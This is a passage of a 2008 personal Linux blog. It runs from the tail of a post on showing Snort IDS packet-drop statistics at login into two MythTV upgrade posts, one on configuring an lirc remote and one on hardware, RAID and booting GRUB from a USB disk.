Add the following function to .bash_profile:<br /><br /><span style="font-family:courier new;">getsnortstats()<br />{<br />if [ -f /etc/init.d/snortd ]; then<br />echo "------------------------------------------------------------"<br />echo " Snort % Pkts dropped and mbits/sec for the last 20 minutes "<br />/usr/local/bin/get-snort-stats.sh 4<br />echo "------------------------------------------------------------"<br />fi<br />}<br /></span><br />5) Add the call to the getsnortstats() function right below the checksnortsigs() function call in bash_profile:<br /><br /><span style="font-family:courier new;">checksnortsigs<br />getsnortstats</span><br /><br />6) Now I'm positive there is a better way to do this, but to make sure the snort.stats file doesn't grow out of control I simply put a line that rm's snort.stats every night in the same script I use to run oinkmaster, recreate sig-msg.map, and restart snort. Not the most elegant solution I know, but it works...<br /><br />When all is said and done, you should see the following information when you log in from now on:<br /><br /><strong><span style="font-family:courier new;">Last login: Thu May 29 16:27:36 2008 from xxxxxxxx </span><br /><span style="font-family:courier new;">-------------- Snort Installation Detected ----------------- </span><br /><span style="font-family:courier new;">The most recent snort rules on this machine were updated on: </span><br /><span style="font-family:courier new;">******* May 30 ******* </span><br /><span style="font-family:courier new;">If the date above is more than 1 month old, run oinkmaster </span><br /><span style="font-family:courier new;">manually and verify it completes without error. 
</span><br /></strong><strong><span style="font-family:courier new;">------------------------------------------------------------<br />------------------------------------------------------------</span><br /><span style="font-family:courier new;">Snort % Pkts dropped and mbits/sec for the last 20 minutes</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 4.672</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 4.796</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 4.369</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 5.071</span><br /></strong><span style="font-family:courier new;"><strong>------------------------------------------------------------<br /></strong></span><br />Enjoy :) </div>Seth Art (http://www.blogger.com/profile/05253599496757968918)<br /><br /><strong>MythTV Upgrade - Part 2</strong> (published 2008-02-18)<br /><br /><strong>Configuring lirc (Remote control daemon)</strong><br /><br />Getting the remote control to work has been on my to-do list for as long as I've been using MythTV. Early on I decided to go with a wireless mouse/keyboard combo instead. I have been using the <a href="http://ione-usa.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=46&category_id=403aa782a4283038673984497e941106&option=com_phpshop&Itemid=1">Ione Scorpius P-20</a> for quite a while and it has served me well.<br /><br /><br /><br /><img id="BLOGGER_PHOTO_ID_5168376986593672082" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" height="124" alt="" src="http://4.bp.blogspot.com/_CunbzMFsEf0/R7nDfG84O5I/AAAAAAAAABI/9xpUk4bSCII/s200/1508ab6e0ef5b76c8fa615387a97104d.jpg" width="176" border="0" /><br /><br />Every 6 months or so I would try to get the remote working, and every time I would fail... 
until this weekend. I couldn’t have done it without the following two sites:<br /><br />1) <a href="http://www.mythtv.org/wiki/index.php/MCE_Remote">http://www.mythtv.org/wiki/index.php/MCE_Remote</a><br />2) <a href="http://www.hauppauge.co.uk/board/showthread.php?t=8048">http://www.hauppauge.co.uk/board/showthread.php?t=8048</a><br /><br /><a href="http://2.bp.blogspot.com/_CunbzMFsEf0/R7nbKm84O6I/AAAAAAAAABQ/8yOyacEiuPw/s1600-h/Mce-hauppauge.jpg"><img id="BLOGGER_PHOTO_ID_5168403022685420450" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_CunbzMFsEf0/R7nbKm84O6I/AAAAAAAAABQ/8yOyacEiuPw/s200/Mce-hauppauge.jpg" border="0" /></a><br />I have a Hauppauge PVR-150 Tuner card which came with the Remote and the IR receiver. I would say my biggest stumbling point along the way was that until this weekend I never knew exactly which remote I had. Apparently the PVR-150 has come with a whole bunch of different remotes over its lifetime.<br /><br /><br /><br />As it turns out, I have a MCE USB2, Version 2, Hauppauge PVR-Kit remote. How I was supposed to know that without luckily finding that first link, I have no idea. A picture truly is worth a thousand words sometimes. 
The only identifying number on the back was "RC 6" ir.<br /><br />So now on to the configuration:<br /><br />MythDora4 comes with lircd version 0.8.2-CVS:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">[root@mythtv mythtv]# /usr/sbin/lircd -v<br />lircd 0.8.2-CVS</span><br /></span><br />After reading a bunch of caveats on the MythTV.org wiki link above, I decided to use CVS and go right to the latest version.<br /><br />I followed the wiki instructions exactly:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">cd /usr/src<br />cvs -d:pserver:anonymous@lirc.cvs.sourceforge.net:/cvsroot/lirc login<br />cvs -z8 -d:pserver:anonymous@lirc.cvs.sourceforge.net:/cvsroot/lirc co lirc<br />cd lirc<br />ls<br />./autogen.sh<br />./setup.sh</span><br /></span>Menu Option # (1) - Driver Configuration (enter)<br />Menu Option # (8) - USB Devices (enter)<br />Menu Option # (t) - Windows Media Center Remotes (new version, Philips et al.) (enter)<br />Menu Option # (3) - Save your configuration and run configure (enter)<br /><span style="font-family:courier new;font-size:85%;">make && make install<br />modprobe lirc_mceusb2</span><br /><br />This installed lircd in /usr/local/sbin/lircd (this will be important later). 
First I used mode2 to see if the IR receiver was working:<br /><br /><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# mode2</span><br /><span style="font-family:courier new;font-size:85%;">(I then pressed the up arrow on the remote)</span><br /><span style="font-family:courier new;font-size:85%;">space 100000</span><br /><span style="font-family:courier new;font-size:85%;">pulse 2750</span><br /><span style="font-family:courier new;font-size:85%;">space 750</span><br /><span style="font-family:courier new;font-size:85%;">pulse 500</span><br /><span style="font-family:courier new;font-size:85%;">space 400</span><br /><span style="font-family:courier new;font-size:85%;">pulse 500</span><br /><span style="font-family:courier new;font-size:85%;">space 350</span><br /><span style="font-family:courier new;font-size:85%;"></span><br /><br /><snip>- That output means it was catching the signals<br /><br />Unfortunately when I started lircd, ran irw, and then pressed the same buttons, nothing showed up:<br /><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# /usr/local/sbin/lircd /etc/lircd.conf</span><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# irw</span><br /><br />I tried a few pre-made lircd.conf files online, but the one from that second link is what finally worked. The lircd.conf file is what maps the IR code to a button on your remote. 
It looks something like this:<br /><br /><span style="font-family:courier new;font-size:85%;">Power 0x00007bf3 # no e2,e3<br />MyTV 0x00007bb9 # starts at af<br />MyMusic 0x00007bb8 # starts at af<br />MyPictures 0x00007bb6 # starts at af<br />MyVideos 0x00007bb5 # starts at af<br />Record 0x00007be8 # no e2,e3<br />Stop 0x00007be6 # no e2,e3<br />Pause 0x00007be7 # no e2,e3<br /><snip></span><br /><br />This time, when I run irw I see the following output:<br /><br /><span style="font-family:courier new;"><span style="font-size:85%;">[root@mythtv lirc]# lircd /etc/lircd.conf</span><br /></span><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# irw<br />000000037ff07be1 00 Up mceusb<br />000000037ff07be0 00 Down mceusb<br />000000037ff07bdf 00 Left mceusb<br />000000037ff07bde 00 Right mceusb<br />000000037ff07bfa 00 Five mceusb<br />000000037ff07bf9 01 Six mceusb<br /></span><br />That is farther than I have ever been before. Now the last part is the .lircrc file. This file maps the named button to the program and action (or keystroke) and is located in the user's home directory. 
(ex: /home/mythtv/.lircrc)<br /><br />To review:<br /><br />lircd.conf -> Maps IR code to a button name on the remote<br />.lircrc -> Maps the button on the remote to a corresponding keystroke (application dependent).<br /><br />An excerpt of the .lircrc file looks something like this:<br /><br /><span style="font-family:courier new;font-size:85%;"># Down = Scroll/Channel Down.<br />begin<br />prog = mythtv<br />button = Down<br />config = Down<br />repeat = 2<br />end<br /><snip></span><br />This tells us that when (according to lircd.conf) the Down button is pressed, if we are in mythtv, this should be equivalent to the down arrow.<br /><br />I then started lircd with my new lircd.conf and .lircrc files in place:<br /><span style="font-family:courier new;">[root@mythtv lirc]# lircd /etc/lircd.conf</span><br /><br />And with that my remote control worked with MythTV for the first time ever.<br /><br />The last thing I did was to change the /etc/rc.d/init.d/lircd file so that the service script starts my newly compiled lircd 0.8.3-CVS rather than the stock lircd.<br /><br /><span style="font-family:georgia;">Just to reiterate which version is which:</span><br /><span style="font-family:courier new;font-size:85%;"></span><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv mythtv]# /usr/sbin/lircd -v</span><br /><span style="font-family:courier new;font-size:85%;">lircd 0.8.2-CVS<br />[root@mythtv lirc]# /usr/local/sbin/lircd -v<br />lircd 0.8.3-CVS<br /></span><br />I changed the lircd and lircmd paths in /etc/rc.d/init.d/lircd to point at /usr/local/sbin, so the relevant part of that file now reads:<br /><br /><span style="font-family:courier new;font-size:85%;">[ -x /usr/local/sbin/lircd ] || exit 1<br />[ -x /usr/local/sbin/lircmd ] || exit 1<br /><br />start(){<br />if [ -f /etc/lircd.conf ]; then<br />echo -n $"Starting infrared remote control daemon: "<br />daemon /usr/local/sbin/lircd $LIRCD_OPTIONS<br />RETVAL=$?<br />echo<br />fi<br /></span><br /><br />Troubleshooting:<br /><br />The lircd binary that came with 
MythDora4 wrote debug information to /var/log/messages. On the lircd I compiled myself, it wrote messages to /var/log/lircd. Tailing (with a -f) whichever log file lirc is writing to can be a really good way to troubleshoot.<br /><br />Seth Art (http://www.blogger.com/profile/05253599496757968918)<br /><br /><strong>MythTV Upgrade - Part 1</strong> (published 2008-02-03)<br /><br /><strong>Introduction</strong><br /><br />I've been using <a href="http://www.mythtv.org/">MythTV</a> for about 3 years now, both on Fedora Core and also on Ubuntu on my laptop. My first MythTV system was built with A LOT of help from <a href="http://wilsonet.com/mythtv/fcmyth.php">Jarod Wilson's infamous How-To</a>. A few months ago I built two MythTV systems for my family and decided to use <a href="http://g-ding.tv/?q=MythDora">MythDora4</a>. It was so quick and easy that I decided to use MythDora for my own rebuild as well.<br /><br />I should start off by saying that I don’t use MythTV for the PVR functionality. I use it solely as a digital jukebox. I watch TV shows and movies using MythVideo, MythMusic is always a big hit at parties, and occasionally I use MythImage for slideshows.<br /><br />In the past I had all my media files on my WindowsXP box and used cifs to mount the windows shares on my MythTV box. I played music/videos directly through the share and performance was great even with a 10/100 Mbps NIC.<br /><br />For this iteration, I decided to also upgrade to a 1.5TB RAID5 array so that I could start burning all of my DVDs to .ISO files. This way I can browse through my entire DVD collection digitally.<br /><br />Lastly, I recently bought a Harman/Kardon receiver and Polk Audio center channel and bookshelf speakers and slowly realized that I wasn’t going to be able to appreciate the new hardware unless I got digital audio working. 
(And yes… it is amazing)<br /><br />Below are my notes, impressions, etc. for the entire setup. I am going to put in as much detail as possible so that if I ever have to do this again I have it all in one place.<br /><br /><br /><br /><strong>Hardware</strong><br /><strong></strong><br />Dell 8300 Tower, Dell BIOS A07<br />CPU: P4 2.8Ghz Hyperthreaded<br />Memory: 1.25Gb PC3200<br />Audio: M-Audio 5.1 Audio Card<br />Video: Nvidia GeForce 5200 AGP (VGA/DVI/S-Video)<br />Capture Card: Hauppauge PVR-150 Tuner Card<br />Network: 10/100/1000 Intel NIC<br />Storage:<br />(1) 40 GB HDD (IDE) (for the OS)<br />(2) 500GB IDE HDDs (for the RAID)<br />(2) 500GB SATA HDDs (for the RAID)<br /><br /><br /><strong>Configuring the OS</strong><br /><br />The install of the OS is really simple and extremely intuitive. The problems I ran into were caused by my additional disks, but were a result of a bug/lack of code/oversight/etc. in the Dell BIOS. The motherboard has two IDE controllers, and two onboard SATA controllers. My buddies at work gave me the thumbs up on a RAID array that included two IDE and two SATA drives so that’s what I went ahead and did. I already had one 500GB IDE, so I went and bought one more 500GB IDE and two 500GB SATA drives. This was good advice, and to fast forward, I did get it working, but Dell was not going to make it easy for me.<br /><br />After tons of research trying to prove that I wasn’t crazy, I confirmed that on this Dell 8300 BIOS, if you use either or both of the SATA controllers, the BIOS will only let you boot off a SATA drive. This means that if I installed the MBR (Master Boot Record) on one of my IDE drives, no matter what I did in the BIOS, I could not boot off of it. Most BIOSes would obviously let you choose whichever disk you would like, but of course that would make too much sense.<br /><br />The most obvious option was to just install the MBR onto one of the SATA drives. 
However, the whole point of using a separate system disk is that I want to make the RAID array and the OS completely independent of each other. If the disk that had the MBR on it died, I would be out of luck.<br /><br />A more elegant solution to this problem, which was proposed by my coworker, is to install the MBR on both of the SATA disks, so that if one died, the other one would just pick up, but like I mentioned earlier, I wanted to keep the RAID separate.<br /><br />So what I finally decided to do was to install the MBR on a 128 MB USB disk. The end result is kind of a convoluted setup, but I think it’s a pretty cool solution. I like the cool factor that my machine won’t boot without that thumb drive in place, and of course this keeps my RAID array completely separate from the OS. Speaking of cool... I shortly found out that 5 drives in that stock Dell case was the farthest thing from it, but that will be a completely separate article :)<br /><br />So back to the installation. While installing the OS I chose to make my own partitioning scheme, which looked like this:<br />/boot partition on sdc (the USB disk) using all 128MB<br />/boot1 partition on hda (100MB)<br />/ partition went to hda as well (my 40GB system disk).<br />For all three I used the ext3 filesystem.<br />swap went on hda as well (2048 GB)<br /><br />I then installed the OS, rebooted, and FINALLY saw that wonderful line “Grub loading… Please wait” or whatever it is.<br /><br />So for this first boot both phase I and II of the boot loader took place on the USB drive. To play around I wanted to also see if I could get the actual kernel to boot from the system disk rather than the USB disk. 
To do that I had to do the following:<br /><br />I edited the grub/grub.conf that was on the USB disk to look like this (the bold line is the one that points at the system disk):<br /><br /><span style="font-family:courier new;font-size:85%;">default=0<br />timeout=5<br />splashimage=(hd0,0)/grub/splash.xpm.gz<br />hiddenmenu<br />title MythDora-hda (2.6.20-1.2944.fc6)<br /><strong>root (hd5,0)</strong><br />kernel /vmlinuz-2.6.20-1.2944.fc6 ro root=LABEL=/ rhgb quiet<br />initrd /initrd-2.6.20-1.2944.fc6.img<br />title MythDora-usb (2.6.20-1.2944.fc6)<br />root (hd0,0)<br />kernel /vmlinuz-2.6.20-1.2944.fc6 ro root=LABEL=/ rhgb quiet<br />initrd /initrd-2.6.20-1.2944.fc6.img</span><br /><br />I then copied the following files from /boot/ to /boot1:<br /><span style="font-family:courier new;font-size:85%;">config-2.6.20-1.2944.fc6<br />initrd-2.6.20-1.2944.fc6.img<br />symvers-2.6.20-1.2944.fc6.gz<br />vmlinuz-2.6.20-1.2944.fc6<br />System.map-2.6.20-1.2944.fc6</span><br /><br />I then edited /etc/fstab to look like this (the bold line is the one I changed):<br /><br /><span style="font-family:courier new;font-size:85%;">LABEL=/ / ext3 defaults 1 1<br /><strong>/dev/hda1 /boot ext3 defaults 1 2</strong><br />devpts /dev/pts devpts gid=5,mode=620 0 0<br />tmpfs /dev/shm tmpfs defaults 0 0<br />proc /proc proc defaults 0 0<br />sysfs /sys sysfs defaults 0 0<br />LABEL=SWAP-hda2 swap swap defaults 0 0<br />/dev/cdrom /media/cdrom auto noauto,ro,user 0 0</span><br /><br /><br />Then I rebooted again. This time, grub still ran from the USB disk, but it looked at hd5,0 for the kernel, which on my machine is /dev/hda1. It found it and then mounted /dev/hda1 to /boot.<br /><br />I am not sure which is better: leaving the entire boot partition on the USB drive, or using this phased approach; but this is the way I left it. Let me know if you think it makes a difference.<br /><br /><br />The only current problem with the actual OS (MythDora4) is that atrpms recently deprecated the FC6 package repository so updating the system is kind of at a standstill until the next version of MythDora comes out. 
Luckily, <a href="http://g-ding.tv/?q=content/what-were-working">http://g-ding.tv/?q=content/what-were-working</a> shows that the next release, based on Fedora Core 8, will be coming soon. They are just waiting on the release of version 0.21 of MythTV.<br /><br /><br />So I'll leave off with that. Parts two and three will include the following topics:<br /><br /><strong>Configuring the storage (RAID5 + XFS)<br />Configuring Digital Audio (S/PDIF over coax using alsa)<br /></strong><br />Still on the task list is to get the following working:<br /><br /><strong>Configuring LIRC (Remote control)<br />Configuring VGA to Component Video</strong><br /><br />Seth Art (http://www.blogger.com/profile/05253599496757968918)